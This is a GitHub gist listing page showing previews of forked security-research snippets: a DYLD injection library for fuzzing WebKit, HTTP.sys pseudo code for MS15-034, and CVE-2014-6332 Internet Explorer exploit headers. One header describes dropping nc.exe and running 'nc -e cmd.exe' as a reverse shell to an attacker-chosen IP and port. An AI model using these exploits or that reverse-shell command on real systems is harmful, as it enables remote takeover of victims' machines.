Skip to content

Instantly share code, notes, and snippets.

@mtowalski
mtowalski / injection.mm
Created November 8, 2022 12:44 — forked from ant4g0nist/injection.mm
Get pids of XPC services launched by Safari/MiniBrowser -> WebKit ProcessLauncher
//
// main.m
// safari_fuzzer
//
// Created by ant4g0nist on 09/11/2021.
//
/*
Build: ➜ clang++ injection.mm -framework Foundation -dynamiclib -o injection.dylib
Usage: ➜ DYLD_FORCE_FLAT_NAMESPACE=1 DYLD_INSERT_LIBRARIES=injection.dylib /Users/ant4g0nist/Desktop/macOSResearch/WebKit/WebKit/WebKitBuild/Release/MiniBrowser.app/Contents/MacOS/MiniBrowser
@mtowalski
mtowalski / http_sys_pseudo.c
Created June 24, 2016 07:11 — forked from worawit/http_sys_pseudo.c
MS15-034 (CVE-2015-1635) PoCs
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code are reversed from vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone want to know what function are patched.
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
@mtowalski
mtowalski / cve-2014-6332_win7_ie11_poc.html
Created June 24, 2016 07:10 — forked from worawit/cve-2014-6332_win7_ie11_poc.html
CVE-2014-6332 PoC to get shell or bypass protected mode
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
/*
* reversed SafeArrayRedim() in oldaut32.dll (Windows XP)
* for CVE-2014-6332
*/
typedef struct tagSAFEARRAY
{
USHORT cDims; // number of dimensions
USHORT fFeatures; // type of elements
ULONG cbElements; // byte size per element
@mtowalski
mtowalski / cve-2014-6332_exploit.html
Created June 24, 2016 07:10 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)